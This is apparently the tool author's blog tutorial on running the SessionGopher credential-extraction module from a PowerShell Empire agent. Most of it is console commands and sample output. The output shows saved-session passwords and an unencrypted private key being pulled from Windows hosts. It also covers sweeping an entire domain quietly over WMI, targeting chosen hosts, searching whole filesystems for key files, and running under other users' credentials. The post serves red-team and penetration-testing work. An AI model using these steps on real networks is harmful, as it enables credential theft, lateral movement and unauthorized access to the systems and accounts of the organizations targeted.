SessionGopher is now part of PowerShell Empire 2.0. Here’s how to use the module.
Some background: SessionGopher is a PowerShell WinSCP, RDP, FileZilla, PuTTY, SuperPuTTY, .rdp, .ppk, .stdid saved session and password extractor. It automatically deobfuscates and finds passwords for these tools where applicable, and helps you find Unix systems and jump boxes.
Once you have your agent, all there’s left to do is run
(Empire: [agent]) > usemodule credentials/sessiongopher
(Empire: powershell/credentials/sessiongopher) > run
o_
/ ". SessionGopher
," _-"
," m m
..+ ) Brandon Arvanaghi
`m..m Twitter: @arvanaghi | arvanaghi.com
WinSCP Sessions
Source : WIN7-BARVANAGHI\ProfessorX
Session : adm-angela@192.168.43.21
Hostname : 192.168.43.21
Username : adm-angela
Password : dw!ghtB33ts
FileZilla Sessions
Source : WIN7-BARVANAGHI\ProfessorX
Name : Affiliate Jump Box
Password : d3ad0nb4lls@ccurat3
Host : 198.143.22.9
User : MonaLisaVito
Protocol : Use SFTP
Port : 22
Microsoft Remote Desktop (RDP) Sessions
Source : WIN7-BARVANAGHI\ProfessorX
Hostname : dc01
Username : CORP\ProfessorX
Source : WIN7-BARVANAGHI\ProfessorX
Hostname : exchange001
Username : CORP\ProfessorX
PuTTY Sessions
Source : WIN7-BARVANAGHI\ProfessorX
Session : Point of Sale Device
Hostname : 10.25.84.31
SuperPuTTY Sessions
Source : WIN7-BARVANAGHI\DrOctopus
SessionId : Design Computer
SessionName : Design Computer
Host : 192.168.20.166
Username : root
ExtraArgs : -pw kleen3x41
Port : 22
Putty Session : Default Settings
Running as admin allows SessionGopher to extract sessions for every single domain user who has ever logged on to that host. This is done by querying the HKEY_USERS
hive, which contains subkeys for all users who have ever had interactive sessions on that host. These subkeys store saved session information for these tools regardless of whether the user is logged in, and while admin accounts can access every subkey on the system, non-privileged accounts can only access their own.
Query remote hosts using WMI
To run SessionGopher against remote hosts from your agent, use one of the Target
, AllDomain
, or iL
arguments. All three use WMI to query the remote hosts in question, so they run quietly. Note that all three of these arguments require admin privileges on the remote hosts they query.
AllDomain (switch)
This is where the magic happens. AllDomain
runs SessionGopher across every computer in the domain, effectively providing a mapping of the entire domain for you through saved sessions. Beyond credentials, the output of AllDomain
should yield the locations of jump boxes and Unix systems in the environment.
(Empire: powershell/credentials/sessiongopher) > set AllDomain True
(Empire: powershell/credentials/sessiongopher) > run
[+] Digging on DC02...
Microsoft RDP Sessions
Source : DC02\Professorx
Hostname : dc01
Username : CORP\ProfessorX
[+] Digging on WEB01...
[+] Digging on MAIL01...
[+] Digging on WIN7-CLIENT03...
WinSCP Sessions
Source : WIN7-CLIENT03\JimmyMcGill
Session : saulgoodman@192.168.14.80
Hostname : 192.168.14.80
Username : saulgoodman
Password : gravit4s
Microsoft RDP Sessions
Source : WIN7-CLIENT03\JimmyMcGill
Hostname : 10.20.30.35
Username : CORP\Saul.Goodman
PuTTY Sessions
Source : WIN7-CLIENT03\MikeEhrmantraut
Session : Cash_Register
Hostname : 10.14.21.90
... etc ...
Target
Target
runs SessionGopher against a specific remote host you provide.
(Empire: powershell/credentials/sessiongopher) > set Target WIN7-CLIENT01.corp.com
(Empire: powershell/credentials/sessiongopher) > run
... output ...
iL
To specify a set of hosts to run against, provide a path to a .txt file on the beaconing host which contains hostnames separated by newlines.
(Empire: powershell/credentials/sessiongopher) > set iL C:\Users\Professor X\Tmp\hosts.txt
(Empire: powershell/credentials/sessiongopher) > run
... output ...
Additional arguments
Thorough (switch)
Use Thorough
in combination with any other set of arguments to search the entire filesystem for .rdp, .ppk, and .stdid files. Since it searches the entire filesystem, it is not recommended you use Thorough
when querying more than a few hosts at a time. Thorough
output automatically parses .ppk and .rdp files and extracts the relevant session details and private key, like so:
(Empire: powershell/credentials/sessiongopher) > set Thorough True
(Empire: powershell/credentials/sessiongopher) > run
PuTTY Private Key Files (.ppk)
Path : C:\Users\Brandon Arvanaghi\Documents\mykey.ppk
Protocol : ssh-rsa
Comment : rsa-key-20170116
Private Key Encryption : none
Private Key : {AAABAEazxtDz6E9mDeONOmz07sG/n1eS1pjKI8fOCuuLnQC58LeCTlysOmZ1/iC4, g4HyRpmdKJGhIxj66/ RQ135hVesyk02StleepK4+Tnvz3zmdr4Do5W99qKkrWI3D, T9GOxOIoR9Zc6j57D+fdesJq4ItEIxcQZlXC1F9KZcbXjSJ3iBmCsbG/aRJmMJNx,
nCMaZkySr4R4Z/E+l1JOzXaHh5WQ2P0K4YM1/6XG6C4VzDjvXwcY67MYsobTeCR2...}
Private MAC : b7e47819fee39a95eb374a97f939c3c868f880de
Microsoft Remote Desktop .rdp Files
Path : C:\Users\Brandon Arvanaghi\Desktop\config\PenTestLab-Win.RDP
Hostname : dc01.corp.hackerplaypen.com
Gateway : rds01.corp.hackerplaypen.com
Prompts for Credentials : No
Administrative Session : Does not connect to admin session on remote host
... output ...
u and p
To run in the context of a different user account than the context of the beaconing agent, you can specify a username and password.
(Empire: powershell/credentials/sessiongopher) > set u CORP\Bruce.Wayne
(Empire: powershell/credentials/sessiongopher) > set p ImB@tm@n43~
(Empire: powershell/credentials/sessiongopher) > run
... output ...
To see all these options together, enter options
.
(Empire: powershell/credentials/sessiongopher) > options
Name Required Value Description
---- -------- ------- -----------
p False Password for user account (if -u
argument provided).
u False User account (e.g. corp.com\jerry) for
when using -Target, -iL, or -AllDomain.
If not provided, uses current security
context.
Thorough False Switch. Searches entire filesystem for
.ppk, .rdp, .sdtid files. Not
recommended to use with -AllDomain due
to time.
o False Switch. Drops a folder of all output in
.csvs on remote host.
AllDomain False Switch. Run against all computers on
domain. Uses current security context,
unless -u and -p arguments provided.
Uses WMI.
iL False Provide path to a .txt file on the
remote host containing hosts separated
by newlines to run remotely against.
Uses WMI.
Agent True Z9TU5F4A Agent to run module on.
Target False Provide a single host to run remotely
against. Uses WMI.
I built SessionGopher for simplicity, so you can expect to run
without setting any values and still get interesting output. Again, running as admin is preferred.
Have fun, and let me know how it goes!